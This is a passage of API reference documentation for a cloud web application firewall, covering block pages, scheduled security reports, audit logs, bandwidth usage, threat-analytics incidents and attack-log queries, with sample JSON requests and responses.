- "msg": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HT><body>...</body></html>",
- "name": "Attack Block Page",
- "description": "Replacement HTML for Attack Block Page",
- "id": "url-block",
- "group": "Security",
- "http_response_code": 500
}, - {
- "msg": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HT><body>...</body></html>",
- "name": "Server Unavailable Page",
- "description": "Replacement HTML for Server Unavailable Page",
- "id": "server-inaccessible",
- "group": "Security",
- "http_response_code": 503
}, - {
- "msg": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HT><body>...</body></html>",
- "name": "Captcha Enforcement Page",
- "description": "Replacement HTML for Captcha Enforcement Page",
- "id": "captcha-page",
- "group": "Captcha",
- "http_response_code": 200
}, - {
- "msg": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HT><body>...</body></html>",
- "name": "Captcha Block Page",
- "description": "Replacement HTML for Captcha Block Page",
- "id": "captcha-block",
- "group": "Captcha",
- "http_response_code": 200
}
]
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
{- "data": [
- {
- "name": "logo_v2_fnet",
- "description": "",
- "type": "Predefined",
- "image_type": "png",
- "created_at": "11/29/2020 16:17",
- "content": "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPMAAAFnCAMAAABEqI..."
}, - {
- "name": "test_image",
- "description": "for test purpose only",
- "type": "Custom",
- "image_type": "png",
- "created_at": "12/23/2020 10:16",
- "content": "data:image/png;base64,iVBORw0KGgoAAAANSUh..."
}
], - "total": 2,
- "user_perm": "rw"
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| name | string Image name. maximum length is 30 |
| description | string Description of image |
| image_type | string Enum: "png" "gif" "jpg" "tiff" image type |
| content | string Image content. maximum size 24KB |
{- "name": "Company_wide_block",
- "image_type": "png",
- "content": "data:image/png;base64,VBORw0KGgoAAAANSUhEUgAAAEgAAA...",
- "description": "Used for all blocking pages"
}{- "message": "Image '{{image_name}}' was uploaded successfully."
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| name | string Image name. maximum length is 30 |
| description | string Description of image |
| image_type | string Enum: "png" "gif" "jpg" "tiff" image type |
| content | string Image content. maximum size 24KB |
{- "name": "Company_wide_block",
- "image_type": "png",
- "content": "data:image/png;base64,VBORw0KGgoAAAANSUhEUgAAAEgAAA...",
- "description": "Used for all blocking pages"
}{- "message": "Image '{{image_name}}' was edited successfully."
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| name required | string |
{- "message": "Operation is successful"
}Set fabric connection to FGT. Each user can create at most one connection.
| ip | string FGT IP |
| port | string FGT port |
{- "ip": "string",
- "port": "string"
}{- "message": "Success"
}Change the status of selected Fabric connector to active or inactive. Path parameter ip should be in the format of 1_2_3_4
| ip required | string |
| status | boolean true to enable the connection |
{- "status": false
}{- "message": "Success"
}Requires API key secret as Authorization request header. See Request format section for API key secret details.
| cursor | string
|
| filter | string You can filter by report_name and recipients. It is in JSON format. |
| forward | string
|
| size | string The valid page size range is 10-50. |
{- "data": [
- {
- "report_id": "5f0774d6-b8ef-11ea-b496-5ad898b1340f",
- "report_name": "Demo_Report_1",
- "time_range": "24h",
- "recipients": "testuser8@aaa.com",
- "applications": [
- "2277317806"
], - "contents": [
- "src_ip",
- "srccountry"
], - "schedule_str": "Manually",
- "schedule_info": {
- "timezone": 480,
- "repeat": "manually"
}, - "last_run_time": "--",
- "next_run_time": "--"
}, - {
- "report_id": "6a1ce2b2-b8fd-11ea-954f-d63461e01797",
- "report_name": "china",
- "time_range": "24h",
- "recipients": "testuser1@aaa.com",
- "applications": [
- "7263170513"
], - "contents": [
- "main_type"
], - "schedule_str": "At 17:00 on Wednesday of Every Week",
- "schedule_info": {
- "time": "17:0",
- "day": 3,
- "timezone": 480,
- "repeat": "weekly"
}, - "last_run_time": "--",
- "next_run_time": "2020-07-01 17:00"
}, - {
- "report_id": "ae5d7ece-b906-11ea-97b8-baa3eebb43cc",
- "report_name": "dwguo",
- "time_range": "30d",
- "recipients": "testuser0@aaa.com",
- "applications": [
- "4533058409"
], - "contents": [
- "main_type",
- "signature_id",
- "src_ip",
- "srccountry",
- "http_url",
- "signature_cve_id",
- "owasp_top10"
], - "schedule_str": "At 00:00 on Monday of Every Week",
- "schedule_info": {
- "time": "0:0",
- "day": 1,
- "timezone": 480,
- "repeat": "weekly"
}, - "last_run_time": "2020-06-28 16:49",
- "next_run_time": "2020-06-29 00:00"
}, - {
- "report_id": "dfcd526e-b8fb-11ea-ab04-bac5fd66684d",
- "report_name": "fsun",
- "time_range": "24h",
- "recipients": "demos@fortinet.com",
- "applications": [
- "7263170513"
], - "contents": [
- "srccountry",
- "http_url"
], - "schedule_str": "At 15:40 on Every Day",
- "schedule_info": {
- "timezone": 480,
- "repeat": "daily",
- "time": "15:40"
}, - "last_run_time": "2020-06-28 15:40",
- "next_run_time": "2020-06-28 15:40"
}
], - "total": 4,
- "user_perm": "rw",
- "next_cursor": null,
- "prev_cursor": "eyJyZXBvcnRfaWQiOiB7IlMiOiAiNWYwNzc0ZDYtYjhlZi0xMWVhLWI0OTYtNWFkODk4YjEzNDBmIn0sICJvd25lcl9pZCI6IHsiUyI6ICI5MDYyMDMifX0="
}Create a report definition.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| report_id | string report uuid |
| report_name | string report name |
| time_range | string 24h|7d|14d|30d |
| recipients | |
| contents | Array of strings List of report contents |
| schedule_str | string GUI "Schedule" string, e.g., "At 00:00 on Monday of Every Week" |
object schedule | |
| disabled | boolean Schedule state is started (true) or suspended (false) |
{- "report_name": "weekly report",
- "time_range": "7d",
- "recipients": "me@my.domain.com",
- "applications": [
- "0812747818"
], - "contents": [
- "src_ip"
], - "schedule_info": {
- "timezone": 480,
- "repeat": "manually"
}
}{- "message": "The operation was successful."
}Update a report definition.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| report_id | string report uuid |
| report_name | string report name |
| time_range | string 24h|7d|14d|30d |
| recipients | |
| contents | Array of strings List of report contents |
| schedule_str | string GUI "Schedule" string, e.g., "At 00:00 on Monday of Every Week" |
object schedule | |
| disabled | boolean Schedule state is started (true) or suspended (false) |
{- "report_id": "7bb91fe5-5bd3-447a-9273-bda0c03a096a",
- "time_range": "24h",
- "recipients": "me@my.domain.com",
- "applications": [
- "0812747818"
], - "contents": [
- "signature_cve_id"
], - "schedule_info": {
- "date": "1",
- "time": "0:0",
- "timezone": 480,
- "repeat": "monthly"
}
}{- "message": "The operation was successful."
}Delete weekly report definition.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| report_id required | string The report ID. Can be found in Report Detail response or Report List Response. |
{- "message": "The operation was successful."
}Get weekly report list.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| report_id required | string |
[- {
- "report_id": "5f0774d6-b8ef-11ea-b496-5ad898b1340f",
- "report_name": "Demo_Report_1",
- "time_range": "24h",
- "recipients": "testuser@aaa.com",
- "custom_recipient": false,
- "applications": [
- "2277317806"
], - "contents": [
- "src_ip",
- "srccountry"
], - "schedule_str": "Manually",
- "schedule_info": {
- "timezone": 480,
- "repeat": "manually"
}, - "last_run_time": "--",
- "next_run_time": "--"
}
]Deactivate a report means to pause the schedule, while activate a report means to recover the schedule.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
{
"action": "activate",
"report_id": "6a1ce2b2-b8fd-11ea-954f-d63461e01797"
}
{
"action": "deactivate"
"report_id": "6a1ce2b2-b8fd-11ea-954f-d63461e01797"
}
| report_id | string report uuid |
| action | string activate or deactivate |
| report_name | string report name |
{- "action": "activate|deactivate",
- "report_id": "{{report_id}}"
}{- "message": "The operation was successful."
}List the current audit logs.
| filter | string Array like string. Each element shall be JSON like object. Basic structure is Add NOT:1 to exclude given values. Add RANGE:1 to tell that the given filter value is range type (at least two values). Value is an array containing multiple values. The logic between these values is OR logic. |
| size | integer Page size. The range shall be [20, 100]. |
| page | integer Page number. The page number shall be less than 100. |
{- "total": 2,
- "hits": [
- {
- "_id": "a4c9f9d6-dc69-3259-8010-bab5bf9d79f6",
- "user_id": "1234567890",
- "username": "test@example.com",
- "app_name": "TEST_APP",
- "timestamp": 1680650258347,
- "level": "INFO",
- "action": "EDIT",
- "tenant_name": "NULL",
- "body": "Module Known Attack of application TEST_APP updated",
- "has_detail": true
}, - {
- "_id": "ceae9699-edc4-3d0d-84c0-4bb4920685b7",
- "user_id": "1234567890",
- "username": "test@example.com",
- "app_name": "TEST_APP",
- "timestamp": 1680650246408,
- "level": "INFO",
- "action": "EDIT",
- "tenant_name": "NULL",
- "body": "Endpoint of application TEST_APP updated",
- "has_detail": true
}
]
}Fetch the audit log detail.
| log_id required | string Message ID for each log. |
{- "_id": "a4c9f9d6-dc69-3259-8010-bab5bf9d79f6",
- "user_id Detail": "1234567890",
- "username": "test@example.com",
- "endpoint_id": "2549643009",
- "domain": "test.waasonline.com",
- "app_name": "TEST_APP",
- "timestamp": 1680650258347,
- "level": "INFO",
- "action": "EDIT",
- "tenant_name": "NULL",
- "body": "Module Known Attack of application TEST_APP updated",
- "has_detail": true,
- "old": {
- "action": "alert_deny",
- "arithmetic_sql_inject": false,
- "condition_sql_inject": false,
- "cross_site_script": true,
- "embed_sql_inject": true,
- "generic_attacks": true,
- "html_attr_xss_inject": true,
- "html_css_xss_inject": true,
- "html_tag_xss_inject": true,
- "js_func_xss_inject": true,
- "js_var_xss_inject": true,
- "known_exploits": true,
- "line_comments": false,
- "sensitivity_level": 1,
- "sig_except_rules": [ ],
- "sql_func_inject": false,
- "sql_inject": true,
- "stack_sql_inject": true,
- "status": true,
- "stx_except_rules": [ ],
- "trojans": true
}, - "new": {
- "action": "alert_deny",
- "arithmetic_sql_inject": true,
- "condition_sql_inject": true,
- "cross_site_script": true,
- "embed_sql_inject": true,
- "generic_attacks": true,
- "html_attr_xss_inject": true,
- "html_css_xss_inject": true,
- "html_tag_xss_inject": true,
- "js_func_xss_inject": true,
- "js_var_xss_inject": true,
- "known_exploits": true,
- "line_comments": true,
- "sensitivity_level": 1,
- "sig_except_rules": [ ],
- "sql_func_inject": true,
- "sql_inject": true,
- "stack_sql_inject": true,
- "status": true,
- "stx_except_rules": [ ],
- "trojans": true
}
}/security_reports/account_usage/history
{- "exceeded": false,
- "contract_type": "fortinet",
- "usage_type": "bandwidth",
- "months": [
- {
- "period": "Feb 2024",
- "ordered_bandwidth": 50,
- "status": "open",
- "used_bandwidth": 2585.3333333333335,
- "used_bandwidth_display": "2.59K"
}, - {
- "period": "Jan 2024",
- "ordered_bandwidth": 0,
- "status": "closed",
- "used_bandwidth": 251.14666666666668,
- "used_bandwidth_display": "251.15"
}, - {
- "period": "Dec 2023",
- "ordered_bandwidth": 0,
- "status": "closed",
- "used_bandwidth": 509.5733333333333,
- "used_bandwidth_display": "509.57"
}, - {
- "period": "Nov 2023",
- "ordered_bandwidth": 0,
- "status": "closed",
- "used_bandwidth": 0
}
]
}/security_reports/account_usage/detail/202402
| yyyymm required | string like 202402 |
{- "contract_type": "fortinet",
- "usage_type": "bandwidth",
- "days": [
- {
- "day": 1,
- "ordered_bandwidth": 0,
- "used_bandwidth": 0
}, - {
- "day": 2,
- "ordered_bandwidth": 0,
- "used_bandwidth": 0
}, - {
- "day": 3,
- "ordered_bandwidth": 0,
- "used_bandwidth": 0
}, - {
- "day": 4,
- "ordered_bandwidth": 0,
- "used_bandwidth": 0
}, - {
- "day": 5,
- "ordered_bandwidth": 0,
- "used_bandwidth": 0
}, - {
- "day": 6,
- "ordered_bandwidth": 0,
- "used_bandwidth": 0
}, - {
- "day": 7,
- "ordered_bandwidth": 0,
- "used_bandwidth": 0
}, - {
- "day": 8,
- "ordered_bandwidth": 0,
- "used_bandwidth": 0
}, - {
- "day": 9,
- "ordered_bandwidth": 0,
- "used_bandwidth": 86.77333333333333,
- "used_bandwidth_display": "86.77"
}, - {
- "day": 10,
- "ordered_bandwidth": 0,
- "used_bandwidth": 132.02666666666667,
- "used_bandwidth_display": "132.03"
}, - {
- "day": 11,
- "ordered_bandwidth": 0,
- "used_bandwidth": 194.37333333333333,
- "used_bandwidth_display": "194.37"
}, - {
- "day": 12,
- "ordered_bandwidth": 0,
- "used_bandwidth": 196.26666666666668,
- "used_bandwidth_display": "196.27"
}, - {
- "day": 13,
- "ordered_bandwidth": 0,
- "used_bandwidth": 199.25333333333333,
- "used_bandwidth_display": "199.25"
}, - {
- "day": 14,
- "ordered_bandwidth": 0,
- "used_bandwidth": 199.25333333333333,
- "used_bandwidth_display": "199.25"
}, - {
- "day": 15,
- "ordered_bandwidth": 0,
- "used_bandwidth": 237.33333333333334,
- "used_bandwidth_display": "237.33"
}, - {
- "day": 16,
- "ordered_bandwidth": 0,
- "used_bandwidth": 255.89333333333335,
- "used_bandwidth_display": "255.89"
}, - {
- "day": 17,
- "ordered_bandwidth": 0,
- "used_bandwidth": 301.46666666666664,
- "used_bandwidth_display": "301.47"
}, - {
- "day": 18,
- "ordered_bandwidth": 0,
- "used_bandwidth": 903.5466666666666,
- "used_bandwidth_display": "903.55"
}, - {
- "day": 19,
- "ordered_bandwidth": 0,
- "used_bandwidth": 903.5466666666666,
- "used_bandwidth_display": "903.55"
}, - {
- "day": 20,
- "ordered_bandwidth": 0,
- "used_bandwidth": 965.68,
- "used_bandwidth_display": "965.68"
}, - {
- "day": 21,
- "ordered_bandwidth": 0,
- "used_bandwidth": 965.68,
- "used_bandwidth_display": "965.68"
}, - {
- "day": 22,
- "ordered_bandwidth": 0,
- "used_bandwidth": 990.8266666666667,
- "used_bandwidth_display": "990.83"
}, - {
- "day": 23,
- "ordered_bandwidth": 0,
- "used_bandwidth": 3778.6666666666665,
- "used_bandwidth_display": "3.78K"
}, - {
- "day": 24,
- "ordered_bandwidth": 0,
- "used_bandwidth": 12271.44,
- "used_bandwidth_display": "12.27K"
}, - {
- "day": 25,
- "ordered_bandwidth": 0,
- "used_bandwidth": 19105.066666666666,
- "used_bandwidth_display": "19.11K"
}, - {
- "day": 26,
- "ordered_bandwidth": 0,
- "used_bandwidth": 21582.533333333333,
- "used_bandwidth_display": "21.58K"
}, - {
- "day": 27,
- "ordered_bandwidth": 0,
- "used_bandwidth": 21628.24,
- "used_bandwidth_display": "21.63K"
}, - {
- "day": 28,
- "ordered_bandwidth": 0,
- "used_bandwidth": 21628.24,
- "used_bandwidth_display": "21.63K"
}, - {
- "day": 29,
- "ordered_bandwidth": 0,
- "used_bandwidth": 22158.4,
- "used_bandwidth_display": "22.16K"
}, - {
- "day": 30,
- "ordered_bandwidth": 0,
- "used_bandwidth": 22270.48,
- "used_bandwidth_display": "22.27K"
}, - {
- "day": 31,
- "ordered_bandwidth": 0,
- "used_bandwidth": 31414.133333333335,
- "used_bandwidth_display": "31.41K"
}
]
}Get the global setting configurations.
| widget_id required | string widget names. Could be one of threats_timeline, incidents_timeline, srccountry, attack_type, high_risk or http_host |
| action | string Filtered by action values, could be all, block or monitor. |
| host | string |
| time_range | string Could be one of 24h, 240h (10 days) or 720h (30 days) |
{- "start": 1649888460000,
- "end": 1652480460000,
- "line_data": [
- {
- "line_name": "High",
- "number": [
- {
- "id": 1,
- "value": 0,
- "time": 1649888460000
}, - {
- "id": 2,
- "value": 2,
- "time": 1650018060000
}, - {
- "id": 3,
- "value": 2,
- "time": 1650147660000
}, - {
- "id": 4,
- "value": 2,
- "time": 1650277260000
}, - {
- "id": 5,
- "value": 3,
- "time": 1650406860000
}, - {
- "id": 6,
- "value": 3,
- "time": 1650536460000
}, - {
- "id": 7,
- "value": 1,
- "time": 1650666060000
}, - {
- "id": 8,
- "value": 2,
- "time": 1650795660000
}, - {
- "id": 9,
- "value": 0,
- "time": 1650925260000
}, - {
- "id": 10,
- "value": 3,
- "time": 1651054860000
}, - {
- "id": 11,
- "value": 0,
- "time": 1651184460000
}, - {
- "id": 12,
- "value": 0,
- "time": 1651314060000
}, - {
- "id": 13,
- "value": 0,
- "time": 1651443660000
}, - {
- "id": 14,
- "value": 0,
- "time": 1651573260000
}, - {
- "id": 15,
- "value": 0,
- "time": 1651702860000
}, - {
- "id": 16,
- "value": 0,
- "time": 1651832460000
}, - {
- "id": 17,
- "value": 0,
- "time": 1651962060000
}, - {
- "id": 18,
- "value": 0,
- "time": 1652091660000
}, - {
- "id": 19,
- "value": 0,
- "time": 1652221260000
}, - {
- "id": 20,
- "value": 0,
- "time": 1652350860000
}, - {
- "id": 21,
- "value": 0,
- "time": 1652480460000
}
]
}, - {
- "line_name": "Moderate",
- "number": [
- {
- "id": 1,
- "value": 0,
- "time": 1649888460000
}, - {
- "id": 2,
- "value": 0,
- "time": 1650018060000
}, - {
- "id": 3,
- "value": 1,
- "time": 1650147660000
}, - {
- "id": 4,
- "value": 0,
- "time": 1650277260000
}, - {
- "id": 5,
- "value": 0,
- "time": 1650406860000
}, - {
- "id": 6,
- "value": 0,
- "time": 1650536460000
}, - {
- "id": 7,
- "value": 0,
- "time": 1650666060000
}, - {
- "id": 8,
- "value": 0,
- "time": 1650795660000
}, - {
- "id": 9,
- "value": 0,
- "time": 1650925260000
}, - {
- "id": 10,
- "value": 0,
- "time": 1651054860000
}, - {
- "id": 11,
- "value": 0,
- "time": 1651184460000
}, - {
- "id": 12,
- "value": 0,
- "time": 1651314060000
}, - {
- "id": 13,
- "value": 0,
- "time": 1651443660000
}, - {
- "id": 14,
- "value": 0,
- "time": 1651573260000
}, - {
- "id": 15,
- "value": 1,
- "time": 1651702860000
}, - {
- "id": 16,
- "value": 1,
- "time": 1651832460000
}, - {
- "id": 17,
- "value": 0,
- "time": 1651962060000
}, - {
- "id": 18,
- "value": 1,
- "time": 1652091660000
}, - {
- "id": 19,
- "value": 0,
- "time": 1652221260000
}, - {
- "id": 20,
- "value": 0,
- "time": 1652350860000
}, - {
- "id": 21,
- "value": 0,
- "time": 1652480460000
}
]
}, - {
- "line_name": "Low",
- "number": [
- {
- "id": 1,
- "value": 0,
- "time": 1649888460000
}, - {
- "id": 2,
- "value": 0,
- "time": 1650018060000
}, - {
- "id": 3,
- "value": 0,
- "time": 1650147660000
}, - {
- "id": 4,
- "value": 0,
- "time": 1650277260000
}, - {
- "id": 5,
- "value": 0,
- "time": 1650406860000
}, - {
- "id": 6,
- "value": 0,
- "time": 1650536460000
}, - {
- "id": 7,
- "value": 0,
- "time": 1650666060000
}, - {
- "id": 8,
- "value": 0,
- "time": 1650795660000
}, - {
- "id": 9,
- "value": 0,
- "time": 1650925260000
}, - {
- "id": 10,
- "value": 0,
- "time": 1651054860000
}, - {
- "id": 11,
- "value": 0,
- "time": 1651184460000
}, - {
- "id": 12,
- "value": 0,
- "time": 1651314060000
}, - {
- "id": 13,
- "value": 0,
- "time": 1651443660000
}, - {
- "id": 14,
- "value": 0,
- "time": 1651573260000
}, - {
- "id": 15,
- "value": 0,
- "time": 1651702860000
}, - {
- "id": 16,
- "value": 0,
- "time": 1651832460000
}, - {
- "id": 17,
- "value": 0,
- "time": 1651962060000
}, - {
- "id": 18,
- "value": 0,
- "time": 1652091660000
}, - {
- "id": 19,
- "value": 0,
- "time": 1652221260000
}, - {
- "id": 20,
- "value": 0,
- "time": 1652350860000
}, - {
- "id": 21,
- "value": 0,
- "time": 1652480460000
}
]
}
]
}/threat_analytics/incidents?size=20&page=1&local_timezone=-420&time_range=7d&filter=%5B%5D
/threat_analytics/incidents?size=20&page=1&local_timezone=-420&time_range=7d&filter=%5B%7B%22id%22%3A%22action%22%2C%22logic%22%3A%7B%22is%22%3A%7B%22enum%22%3Atrue%7D%2C%22search%22%3A%22string%22%7D%2C%22value%22%3A%5B%22block%22%5D%7D%2C%7B%22id%22%3A%22risk%22%2C%22logic%22%3A%7B%22is%22%3A%7B%22string%22%3Atrue%7D%2C%22search%22%3A%22string%22%7D%2C%22value%22%3A%5B%22Moderate%22%5D%7D%2C%7B%22id%22%3A%22srccountry%22%2C%22logic%22%3A%7B%22is%22%3A%7B%22enum%22%3Atrue%7D%2C%22search%22%3A%22string%22%7D%2C%22value%22%3A%5B%22Japan%22%5D%7D%2C%7B%22id%22%3A%22acknowledged%22%2C%22logic%22%3A%7B%22is%22%3A%7B%22string%22%3Atrue%7D%2C%22search%22%3A%22string%22%2C%22splitter%22%3A%22%2C%22%7D%2C%22value%22%3A%5B%22true%22%5D%7D%5D
| size | string Should be integer and greater than 0 |
| page | string Should be integer and greater than 0 |
| time_range | string Could be 24h-last 24 hours, 240h-last 10 days, or 720h-last 30 days. |
| filter | string HTTP Encode string which should be able to parsed to json format. |
{- "total": 3,
- "result": [
- {
- "incident_id": "ap-southeast-1_4_137",
- "risk": "Moderate",
- "description": "Bot Attacks(Crawler) by 104.131.39.34 from United States",
- "host_desc": "On host cwhu-test.cloud-test.com",
- "acknowledged": false,
- "false_positive": false,
- "threat_count": 1,
- "block_count": 1,
- "lasttime": 1651960985000,
- "blocked": "100.0%"
}, - {
- "incident_id": "ap-southeast-1_4_120",
- "risk": "Moderate",
- "description": "SQL Injection by 4 IPs from Taiwan and Japan",
- "host_desc": "On host cwhu-test.cloud-test.com",
- "acknowledged": false,
- "false_positive": false,
- "threat_count": 43,
- "block_count": 43,
- "lasttime": 1651740557000,
- "blocked": "100.0%"
}, - {
- "incident_id": "ap-southeast-1_4_4",
- "risk": "Moderate",
- "description": "SQL Injection by 207.81.251.233 from Canada",
- "host_desc": "On host krisc80106.cloud-test.com",
- "acknowledged": false,
- "false_positive": false,
- "threat_count": 1,
- "block_count": 0,
- "lasttime": 1650431032000,
- "blocked": "0.0%"
}
]
}| incident_id required | string like us-east-1_4_120 |
{- "incident_id": "us-east-1_4_120",
- "risk": "Moderate",
- "description": "SQL Injection by 4 IPs from Taiwan and Japan",
- "host_desc": "On host test.demo.com",
- "acknowledged": false,
- "false_positive": false,
- "threat_count": 43,
- "block_count": 43,
- "lasttime": 1651740557000,
- "blocked": "100.0%",
- "ep_id": "4488963652",
- "app_name": "test_app",
- "comments": [ ],
- "attack_types": [
- "SQL Injection"
], - "cve_ids": [
- "N/A"
], - "hosts": [
- "test.demo.com"
], - "src_countries": [
- "Taiwan",
- "Japan"
], - "firsttime": 1651733378000,
- "src_ips": [
- {
- "211.75.180.100": "69.8%"
}, - {
- "61.222.58.223": "20.9%"
}, - {
- "1.169.118.81": "7.0%"
}, - {
- "Others": "2.3%"
}
], - "http_urls": [
- {
- "/andie12": "95.3%"
}, - {
- "/auth": "2.3%"
}, - {
- "/": "2.3%"
}
]
}| incident_id required | string |
{- "false_positive": true
}{- "result": "Success"
}| incident_id required | string |
{- "start": 1651733378000,
- "end": 1651740557000,
- "line_data": [
- {
- "line_name": "Threats",
- "number": [
- {
- "id": 1,
- "value": 2,
- "time": 1651733160000
}, - {
- "id": 2,
- "value": 16,
- "time": 1651733580000
}, - {
- "id": 3,
- "value": 4,
- "time": 1651734000000
}, - {
- "id": 4,
- "value": 0,
- "time": 1651734420000
}, - {
- "id": 5,
- "value": 1,
- "time": 1651734840000
}, - {
- "id": 6,
- "value": 0,
- "time": 1651735260000
}, - {
- "id": 7,
- "value": 4,
- "time": 1651735680000
}, - {
- "id": 8,
- "value": 8,
- "time": 1651736100000
}, - {
- "id": 9,
- "value": 0,
- "time": 1651736520000
}, - {
- "id": 10,
- "value": 0,
- "time": 1651736940000
}, - {
- "id": 11,
- "value": 1,
- "time": 1651737360000
}, - {
- "id": 12,
- "value": 2,
- "time": 1651737780000
}, - {
- "id": 13,
- "value": 0,
- "time": 1651738200000
}, - {
- "id": 14,
- "value": 0,
- "time": 1651738620000
}, - {
- "id": 15,
- "value": 0,
- "time": 1651739040000
}, - {
- "id": 16,
- "value": 0,
- "time": 1651739460000
}, - {
- "id": 17,
- "value": 0,
- "time": 1651739880000
}, - {
- "id": 18,
- "value": 5,
- "time": 1651740300000
}
]
}, - {
- "line_name": "Blocked",
- "number": [
- {
- "id": 1,
- "value": 2,
- "time": 1651733160000
}, - {
- "id": 2,
- "value": 16,
- "time": 1651733580000
}, - {
- "id": 3,
- "value": 4,
- "time": 1651734000000
}, - {
- "id": 4,
- "value": 0,
- "time": 1651734420000
}, - {
- "id": 5,
- "value": 1,
- "time": 1651734840000
}, - {
- "id": 6,
- "value": 0,
- "time": 1651735260000
}, - {
- "id": 7,
- "value": 4,
- "time": 1651735680000
}, - {
- "id": 8,
- "value": 8,
- "time": 1651736100000
}, - {
- "id": 9,
- "value": 0,
- "time": 1651736520000
}, - {
- "id": 10,
- "value": 0,
- "time": 1651736940000
}, - {
- "id": 11,
- "value": 1,
- "time": 1651737360000
}, - {
- "id": 12,
- "value": 2,
- "time": 1651737780000
}, - {
- "id": 13,
- "value": 0,
- "time": 1651738200000
}, - {
- "id": 14,
- "value": 0,
- "time": 1651738620000
}, - {
- "id": 15,
- "value": 0,
- "time": 1651739040000
}, - {
- "id": 16,
- "value": 0,
- "time": 1651739460000
}, - {
- "id": 17,
- "value": 0,
- "time": 1651739880000
}, - {
- "id": 18,
- "value": 5,
- "time": 1651740300000
}
]
}
]
}| incident_id required | string |
| name | string Set name='logs' to view attack log samples of a specific incident. This parameter also can be used to group incidents by value. Could be one of app, attack_type, srccountry, http_host, src_ip, http_url, signature_cve_id, owasp_top10, logs. |
{- "total": 1,
- "result": [
- {
- "name": "SQL Injection",
- "threat_count": 43,
- "monitor_count": 0,
- "block_count": 43
}
]
}Get insight events by event type.
Requires API key secret as Authorization request header. See Authentication section for API key secret details.
| type | string Events type should be in 'exposed_server', 'trust_ip', 'unprotectd_host', 'monitor_service', 'waf_config_alarm' |
| cursor | string To list the items of the first page, leave the cursor value empty. To go forward to next page, get the value of the "next_cursor" parameter in the result of the current page, then paste it here as the cursor value. To go to the previous page, get the "prev_cursor" value, then paste it here as the cursor value. |
| size | string An integer, the page size. The value shall be 10, 20, 30. |
| forward | string True: the next page; False: the previous page. |
{- "detail": "Successfully",
- "result": {
- "type": "exposed_server",
- "events": [
- {
- "id": "2009781812",
- "app_name": "aws_test1",
- "origin_server": [
- "54.89.9.72"
], - "exposed_dns": 0,
- "direct_access": 1,
- "last_updated": "2022-08-11 21:31:40.828348+00:00"
}, - {
- "id": "5467256126",
- "app_name": "aws_test2",
- "origin_server": [
- "52.78.82.9"
], - "exposed_dns": 0,
- "direct_access": 1,
- "last_updated": "2022-08-11 21:31:41.434888+00:00"
}
], - "prev_cursor": "eyJsYXN0X3VwZGF0ZWQiOiB7IlMiOiAiMjAyMi0wOC0xMVQyMTozMTo0MC44MjgzNDgrMDAwMCJ9LCAicmFuZ2VfaWQiOiB7IlMiOiAiZXhwb3NlZF9zZXJ2ZXIifSwgInVzZXJfaWQiOiB7IlMiOiAiZmVhZjA0OWUtOWE2OC0xMWViLWEyNjQtMGE3YTM0MDQzZDJmIn0sICJlcF9pZCI6IHsiUyI6ICIyMDA5NzgxODEyIn19",
- "next_cursor": "",
- "total": 2
}
}Execute insight events action.
Requires API key secret as Authorization request header. See Authentication section for API key secret details.
/threat_analytics/insight?id={id}&type=trust_ip&action={action}&malicious_ip={ip}
/threat_analytics/insight?id={id}&type=unprotected_host&action={action}
/threat_analytics/insight?id={id}&type=monitor_service&action={action}&threat_type={type}
/threat_analytics/insight?id={id}&type=waf_config_alarm&status={status}&configuration={configuration}
| id required | string Application epid |
| type required | string Events type should be in 'trust_ip', 'unprotectd_host', 'monitor_service', 'waf_config_alarm' |
| action | string Excute action to application; 'apply': means approve and change configuration to related module 'ack': means ignore the events |
| status | string This parameter is used when the type is 'waf_config_alarm' and the value is 'disable' or 'alert'. |
| configuration | string This parameter is used when the type is 'waf_config_alarm' and the value is 'Block Mode', 'KnownAttacks', 'DDos' or 'Request Limit'. |
{ }Get insight events summary.
Requires API key secret as Authorization request header. See Authentication section for API key secret details.
{- "detail": "Successfully",
- "result": {
- "summary": [
- {
- "type": "exposed_server",
- "active": 2
}, - {
- "type": "unprotected_host",
- "active": 4
}, - {
- "type": "trust_ip",
- "active": 0
}, - {
- "type": "monitor_service",
- "active": 0
}, - {
- "type": "waf_config_alarm",
- "active": 0
}
]
}
}The possible values include ['cloud_us-east-1','cloud_eu-central-1', 'onpremise_us-east-1' and 'onpremise_eu-central-1'].
[- "cloud_us-east-1",
- "cloud_eu-central-1"
]This API returns up to 10000 logs which meet existing filters.
| storage_region required | string Enum: "cloud_us-east-1" "cloud_eu-central-1" "onpremise_us-east-1" "onpremise_eu-central-1" Example: cloud_us-east-1 Region name in which the logs are stored. |
| time_range | string Example: time_range=24h range of generated time of attack logs. |
| page | number Example: page=1 page number, starting from 1 |
| size | number Example: size=20 Number of logs in one page. maximum allowed value is 100. |
| filter | string Example: filter=%5B%7B%22id%22%3A%22srccountry%22%2C%22logic%22%3A%7B%22RANGE%22%3A0%2C%20%22NOT%22%3A0%7D%2C%22value%22%3A%5B%22country1%22%2C%20%22country2%22%5D%7D%5D The filter value must be Array like string. Each element shall be JSON like object and encoded as URI component.Filter should be with format like: [{"id":"srccountry","logic":{"RANGE":0, "NOT":0},"value":["country1", "country2"]}]. Set NOT=1 to exclude given values. Set RANGE=1 to filter by range. Supported filter keys are: 'srccountry', 'ep_domain', 'app_name', 'action', 'log_id', 'signature_id', 'signature_cve_id', 'http_host', 'http_url', 'http_method', 'http_refer', 'http_agent', 'http_version', 'msg', 'msg_id', 'service', 'main_type', 'sub_type', 'owasp_top10', 'src_port', 'threat_level', 'date_time'. |
{- "total": 123,
- "hits": [
- {
- "_id": "0f05848f-ccab-43ce-a210-7e7f6d8cde7e",
- "app_name": "application name",
- "msg": "Known Attacks: Known Exploits violation in Raw URI",
- "srccountry": "Netherlands",
- "src_ip": "152.89.196.211",
- "threat_level": "Severe",
- "signature_id": "090501003",
- "date_time": "2023-03-04T01:07:05+00:00",
- "action": "Block",
- "ep_id": "4056551849",
